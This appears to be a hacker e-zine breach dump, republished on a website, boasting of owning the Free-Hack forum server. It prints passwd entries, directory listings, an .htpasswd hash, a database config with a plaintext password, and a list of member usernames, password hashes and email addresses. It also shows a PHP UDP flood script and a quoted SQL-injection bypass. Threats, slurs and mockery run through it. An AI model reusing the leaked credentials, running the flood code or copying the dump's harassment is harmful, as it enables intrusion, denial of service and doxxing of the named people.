cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
freehack:x:508:504::/home/freehack:/usr/local/cpanel/bin/jailshell
ntp:x:38:38::/etc/ntp:/sbin/nologin
lsadm:x:101:32009::/:/sbin/nologin


$ ls -la /
total 108
drwxr-xr-x 24 root root 4096 Nov 30 02:12 .
drwxr-xr-x 24 root root 4096 Nov 30 02:12 ..
-rw-r--r-- 1 root root 0 Nov 30 02:12 .autofsck
-rw-r--r-- 1 root root 0 Jan 17 2009 .autorelabel
drwx------ 2 root 500 4096 Nov 11 18:43 .spamassassin
lrwxrwxrwx 1 root root 39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
drwx--x--x 3 root root 4096 Nov 13 09:00 backup
drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin
drwxr-xr-x 2 root root 4096 Jan 26 2010 boot
drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev
drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc
drwx--x--x 8 root root 4096 Nov 14 07:11 home
drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib
drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64
drwxr-xr-x 2 root root 4096 Jan 26 2010 media
drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt
drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt
dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc
drwxr-x--- 14 root root 4096 Dec 8 21:36 root
drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin
drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts
drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux
drwxr-xr-x 2 root root 4096 Jan 26 2010 srv
drwxr-xr-x 3 root root 0 Nov 30 02:12 sys
drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp
drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr
drwxr-xr-x 22 root root 4096 Nov 11 18:01 var

$ ls -la /home/freehack/public_html
total 3100
drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 .
drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 ..
-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess
drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd
-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log
drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt
-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php
-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php
-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php
-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php
-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php
-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php
-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php
-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php
-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php
-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php
-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php
-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php
-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php
-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache
-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive
-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php
-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php
-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php
-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php
-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php
-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php
-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png
-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php
drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder
drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog
-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php
-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php
-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin
-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples
-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php
drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm
drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles
-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php
-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php
-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php
-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics
-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php
-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php
-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php
-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php
-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php
-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico
-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php
-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php
-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php
-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php
-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php
-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html
-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php
-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php
-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php
-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess
-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php
drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images
drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img
drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes
-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php
-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php
-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php
-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php
-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp
-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php
-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php
-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php
-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php
-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php
-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php
-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php
-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php
-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php
-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php
drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste
-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png
-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php
-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php
-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php
-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php
-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php
-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php
-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php
-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php
-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php
-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php
-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php
-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php
-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php
-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php
-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php
-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php
-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php
-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php
-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php
-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php
-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php
-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php
-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap
-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php
-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php
-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php
-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php
-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php
drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp
-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php
-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php
drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise
drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo
-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php
drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap
-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php
-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php
-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php
-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php


RETARDED PHP CODE ALERT!

$ cat x.php
<?
if(!$_GET['target'])
{
die('no target ip specified!');
}
$target = $_GET['t'];

$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$sock) die(__LINE__);

$data='';
for($i=0;$i<1400;$i++)
{
$data.=chr(rand(0,255));
}

while(true)
{
if(!socket_sendto($sock,$data,strlen($data),0,$target,9)) die(__LINE__);
echo('.');
}

?>



$ cd 2tgh9322132k322l1sd

$ ls
total 252
drwxr-xr-x 11 508 504 4096 Nov 14 09:24 .
drwxr-x--- 34 508 99 4096 Dec 4 22:13 ..
-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess
-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe
-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php
-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css
-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php
-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log
-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php
-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc
-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php
-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js
drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language
-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php
-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php
-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron
-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php
-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php
-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php
drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl
drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work

$ cat .htpasswd
Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1

$ cat config.php
<?php
// MySQL Dumper Configuration

// Host-Adress, default 'localhost'
$config['dbhost'] = 'localhost';
// port - if empty, mysql uses default
$config['dbport'] = '';
// socket - if empty, mysql uses default
$config['dbsocket'] = '';

// Username
$config['dbuser'] = 'freehack';
//User-Pass. For no Password leave empty
$config['dbpass'] = '7qm#2nwAc$oU';

//Speed Values between 50 and 1000000
//use low values if you have bad connection or slow machines
$config['minspeed']=100;
$config['maxspeed']=50000;

// Interface language and style
$config['language']='en';
$config['theme']='msd';

//Shows the Serveradress if 1
$config['interface_server_caption']=1;
$config['interface_server_captioncolor']='#ff9966';
//Position of the Serveradress 0=left, 1=right
$config['interface_server_caption_position']=0;

//Height of the SQL-Box in Mini-SQL in pixel
$config['interface_sqlboxsize']=70;
$config['interface_table_compact']=0;

// Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
$config['memory_limit']=100000;

// For gz-Compression set to 1, without compression set to 0
$config['compression']=1;

//Refreshtime for MySQL processlist in msec, use any value >1000
$config['processlist_refresh']=3000;

$config['empty_db_before_restore']=0;
$config['optimize_tables_beforedump']=1;
$config['stop_with_error']=1;

// For sending a mail after backup set send_mail to 1, otherless set to 0
$config['send_mail']=0;
// Attach the backup 0=no 1=yes
$config['send_mail_dump']=0;
// set the recieve adress for the mail
$config['email_recipient']='';
$config['email_recipient_cc']='';
// set the sender adress (the script)
$config['email_sender']='';

//max. Size of Email-Attach, here 3 MB
$config['email_maxsize1']=3;
$config['email_maxsize2']=2;

// FTP Server Configuration for Transfer
$config['ftp_transfer'][0]=0;
$config['ftp_timeout'][0]=30;
$config['ftp_useSSL'][0]=0;
$config['ftp_mode'][0]=0;
$config['ftp_server'][0]=''; // Adress of FTP-Server
$config['ftp_port'][0]='21'; // Port
$config['ftp_user'][0]=''; // Username
$config['ftp_pass'][0]=''; // Password
$config['ftp_dir'][0]=''; // Upload-Directory

$config['ftp_transfer'][1]=0;
$config['ftp_timeout'][1]=30;
$config['ftp_useSSL'][1]=0;
$config['ftp_mode'][1]=0;
$config['ftp_server'][1]='';
$config['ftp_port'][1]='21';
$config['ftp_user'][1]='';
$config['ftp_pass'][1]='';
$config['ftp_dir'][1]='';

$config['ftp_transfer'][2]=0;
$config['ftp_timeout'][2]=30;
$config['ftp_useSSL'][2]=0;
$config['ftp_mode'][2]=0;
$config['ftp_server'][2]='';
$config['ftp_port'][2]='21';
$config['ftp_user'][2]='';
$config['ftp_pass'][2]='';
$config['ftp_dir'][2]='';

//Multipart 0=off 1=on
$config['multi_part']=0;
$config['multipartgroesse1']=1;
$config['multipartgroesse2']=2;
$config['multipart_groesse']=0;

//Auto-Delete 0=off 1=on
$config['auto_delete']=0;
$config['max_backup_files']=3;

//configuration file
$config['cron_configurationfile']='mysqldumper.conf.php';
//path to perl, for windows use e.g. C:perlbinperl.exe
$config['cron_perlpath']='/usr/bin/perl';
//mailer use sendmail(1) or SMTP(0)
$config['cron_use_sendmail']=1;
//path to sendmail
$sendmail_path=ini_get('sendmail_path');
$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';

//adress of smtp-server
$config['cron_smtp']='localhost';
//smtp-port
$config['cron_smtp_port']=25;
$config['cron_extender']=0;
$config['cron_compression']=1;
$config['cron_printout']=1;
$config['cron_completelog']=1;
$config['cron_comment']='';
$config['multi_dump']=0;
$config['logcompression']=1;
$config['log_maxsize1']=1;
$config['log_maxsize2']=2;
$config['log_maxsize']=1048576;


________________________
| |_____ __
| FREE-HACK LIST OF LAME | |__| |_________
|________________________| |::| | /
/\**/\ | \.____|::|__| <
( o_o )_ | \::/ \._______\
(u--u \_) |
(||___ )==\
,dP"/b/=( /P"/b\
|8 || 8\=== || 8
`b, ,P `b, ,P
"""` """`

AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de
fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com
N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com
100:f97becbc6292ac264119ca57881f643c:a<"
:ttorben@mailde.de
Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com
noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de
Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru
sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de
Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com
Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de
inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de
H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de
meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net
J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com
#b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de
enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru
Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com
Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com
PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de
GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de
GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com
Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com
DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com
Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru
novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net
ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net
krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com

We think that novaca!ne's magic_quotes bypass is quite representative
for this group:

--snip snip--

Bypass magic_quotes (novaca!ne)
magic_quotes is a php setting (php.ini).
It causes that every ' (single-quote), "
(double quote) and \ (backslash)
are escaped with a backslash automatically, a weak but wellknown securing method.
This is how to bypass it:
Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command
into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling.
‘ OR ‘a’ = ‘a equals
String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)

--snip snip--

novaca!ne is (next to fred777) of course, our new security superhero!
Congratz, faggot...

Finally we shouldn't forget our old fag superhero fred777, who helped
us to understand how we could get every source code of a page. This
sounds pretty hard, but fred777 shows his priv8 techniques (we fear
them):

--snip snip--
#########################################################
# Sourcecode disclosure by social engineering
# tested on NPD
#########################################################

Intro:
Ich schildere hier mal einen Fall, welchen ich letztens
noch vor mir hatte. Ich war durch Zufall mal wieder auf den
vielen NPD Seiten, um nach Lücken zu suchen.
Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte
es den Anschein, als ob sich da eine SQL Injection befände.

Sobald nämlich der Limitparameter falsch übergeben wurde, kam der
übliche SQL Error:

---------------------------------------------------------

Rein logisch sah der Query so aus:

SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10;

Als ich dann mittels eines Scripts versuchte den Query mit UNION
zu erweitern, wollte es aber nicht funktionieren.
Klar dafür konnte es so einige Gründe geben, allerdings hätte
ich mir zu gerne den Source + Abfragen angeschaut.

---------------------------------------------------------

Wieso eigentlich nicht?

Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den
Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt.

--snip snip--

What we learned is:
- If we write an email to an admin we always get the source code
- fred777 uses tools to exploit some sql injection

"o_O", one of the banned users puts it nicely: "being lame is one of
fred777's master skills"
Just to inform you: We owned Free-Hack with
this technique of course.

TIME FOR SOME
______________________________________________________________________
IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI
Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI
Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI
Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI
Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI
Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI
IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI

Right, who deserves it? Correct! Suicide and enco for being badass
super high skilled computer professionals ... NOT

This is a warning Free-Hack. Continue existing and we will show no
mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.

,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/
~ last words ~ !

That's all for now. We hope that those we have owned understood the
warning and that those who already enjoyed issue one were satisfied
with this release. We will take a little break for now and go to
Hawaii to get our asses drunk. But do not fear. There will always be
enough time for us to audit more code, write more 0day and own more
idiots. We will always watch the scene and act if we are needed. There
is sill a lot to do and the winter of hax is not over yet. So do
expect us.

|\
/()/
\| - the happy ninjas
____________________________________________________|_._._._._._._._,
\___________________________________________________|_|_|_|_|_|_|_|_|
! ~ OUTRO ~
,
. |
/
\

  
I
/
\ .g88R_
d888(` ). _
- --==, 888( ),=-- .+(` )`.
) Y8P( '`, :( . )
.+(`( , ) .-- `. ( ) )
(( (..__,:'-' .=( ) ` _` ) )
`. `( ) ) ( , ) ( ) ._
) ` __.:' ) ( ( )) `-',:ccee88oo,
) ) ( ) --' `- __,' ccC8O8O8Q8PoOb.o8oo
.-' (_,' ,') pqdOB69QOFFE4OpugoO9bD
.(_ ) CgggbbU8OU qOp qOdoUOdcb,
. , .3X4X5U2M/p u gcoUodpP
.\\\// /douUP
And shepherds we shall be, for thee my Lord for \\\////. (´`)
thee, power hath descended forth from thy hand, |||||. ,.(´ -.),.
that our feet may swiftly carry out thy command. |||/\, ( , ,)
We shall flow a river forth to thee, and teeming |||\/. `-´`´`´.
with souls shall it ever be. In nomine patris, |||||.
et filii, et spiritus sancti ,..,,.,.,....,,,,//||||\...,,,,
,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,.
.,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT